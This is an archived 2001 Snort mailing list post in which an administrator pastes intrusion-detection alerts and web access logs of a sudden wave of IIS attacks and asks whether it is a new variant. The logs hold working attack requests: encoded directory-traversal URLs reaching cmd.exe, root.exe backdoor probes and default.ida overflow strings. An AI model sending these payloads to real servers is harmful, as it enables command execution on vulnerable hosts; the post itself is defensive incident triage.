Snort mailing list archives
WEB-IIS Cmd attack
From: Togan Muftuoglu <toganm () users sourceforge net>
Date: Tue, 18 Sep 2001 17:34:12 +0300
Hi, Suddenly there is flood of Web-IIS CM attacks this is just a tiny bit of it, Is this a new variant or script kiddes around ? TIA Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2031 -> 212.174.50.248:80 Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2031 -> 212.174.50.248:80 Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2109 -> 212.174.50.248:80 Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2109 -> 212.174.50.248:80 Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2177 -> 212.174.50.248:80 Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2177 -> 212.174.50.248:80 Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2243 -> 212.174.50.248:80 Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2243 -> 212.174.50.248:80 Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2294 -> 212.174.50.248:80 Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2294 -> 212.174.50.248:80 Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2522 -> 212.174.50.248:80 Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2522 -> 212.174.50.248:80 Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2613 -> 212.174.50.248:80 Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2613 -> 212.174.50.248:80 Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2673 -> 212.174.50.248:80 Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2673 -> 212.174.50.248:80 Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2726 -> 212.174.50.248:80 Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2726 -> 212.174.50.248:80 Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2766 -> 212.174.50.248:80 Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2766 -> 212.174.50.248:80 Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3155 -> 212.174.50.248:80 Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3155 -> 212.174.50.248:80 Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3216 -> 212.174.50.248:80 Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3216 -> 212.174.50.248:80 Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3271 -> 212.174.50.248:80 Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3271 -> 212.174.50.248:80 Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80 Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80 Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:3992 -> 212.174.50.248:80 Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:3992 -> 212.174.50.248:80 Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4172 -> 212.174.50.248:80 Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4172 -> 212.174.50.248:80 Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4291 -> 212.174.50.248:80 Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4291 -> 212.174.50.248:80 Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4382 -> 212.174.50.248:80 Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4382 -> 212.174.50.248:80 Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4575 -> 212.174.50.248:80 Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4575 -> 212.174.50.248:80 Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4674 -> 212.174.50.248:80 Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4674 -> 212.174.50.248:80 Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4770 -> 212.174.50.248:80 Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4770 -> 212.174.50.248:80 Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4875 -> 212.174.50.248:80 Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4875 -> 212.174.50.248:80 Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1137 -> 212.174.50.248:80 Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1137 -> 212.174.50.248:80 Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1483 -> 212.174.50.248:80 Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1483 -> 212.174.50.248:80 Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1616 -> 212.174.50.248:80 Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1616 -> 212.174.50.248:80 Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1789 -> 212.174.50.248:80 Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1789 -> 212.174.50.248:80 Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2014 -> 212.174.50.248:80 Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2014 -> 212.174.50.248:80 Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2099 -> 212.174.50.248:80 Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2099 -> 212.174.50.248:80 Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2606 -> 212.174.50.248:80 Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2606 -> 212.174.50.248:80 Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2649 -> 212.174.50.248:80 Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2649 -> 212.174.50.248:80 Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2672 -> 212.174.50.248:80 Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2672 -> 212.174.50.248:80 Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2702 -> 212.174.50.248:80 Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2702 -> 212.174.50.248:80 Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2729 -> 212.174.50.248:80 Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2729 -> 212.174.50.248:80 Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3041 -> 212.174.50.248:80 Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3041 -> 212.174.50.248:80 Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3202 -> 212.174.50.248:80 Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3202 -> 212.174.50.248:80 Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3379 -> 212.174.50.248:80 Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3379 -> 212.174.50.248:80 Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3402 -> 212.174.50.248:80 Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3402 -> 212.174.50.248:80 Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3417 -> 212.174.50.248:80 Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3417 -> 212.174.50.248:80 Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3594 -> 212.174.50.248:80 Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3594 -> 212.174.50.248:80 Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3617 -> 212.174.50.248:80 Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3617 -> 212.174.50.248:80 Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3638 -> 212.174.50.248:80 Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3638 -> 212.174.50.248:80 Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3661 -> 212.174.50.248:80 Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3661 -> 212.174.50.248:80 Sep 18 16:59:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.174.113.99:4917 -> 212.174.50.248:80 ::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.147.6%134595336 - - [18/Sep/2001:16:50:59 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66 - - [18/Sep/2001:16:55:56 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:55:58 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:00 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:01 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:03 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:05 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:06 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:08 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:10 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:11 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:15 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:17 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:19 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:21 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:23 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:24 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34 - - [18/Sep/2001:16:57:24 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:25 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:30 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:31 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:34 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:41 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:46 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:49 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" "" ::ffff:212.174.113.99 - - [18/Sep/2001:16:59:16 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 - "" "" ----- End forwarded message ----- -- Togan Muftuoglu _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- WEB-IIS Cmd attack Togan Muftuoglu (Sep 18)
- Re: WEB-IIS Cmd attack R P G (Sep 18)
- Re: WEB-IIS Cmd attack cdowns (Sep 18)
- Re: WEB-IIS Cmd attack Togan Muftuoglu (Sep 18)
- Re: WEB-IIS Cmd attack Erek Adams (Sep 18)
- Re: WEB-IIS Cmd attack cdowns (Sep 18)
- Re: WEB-IIS Cmd attack John Sage (Sep 18)
- <Possible follow-ups>
- Re: WEB-IIS Cmd attack Dr SuSE (Sep 18)
- Re: WEB-IIS Cmd attack R P G (Sep 18)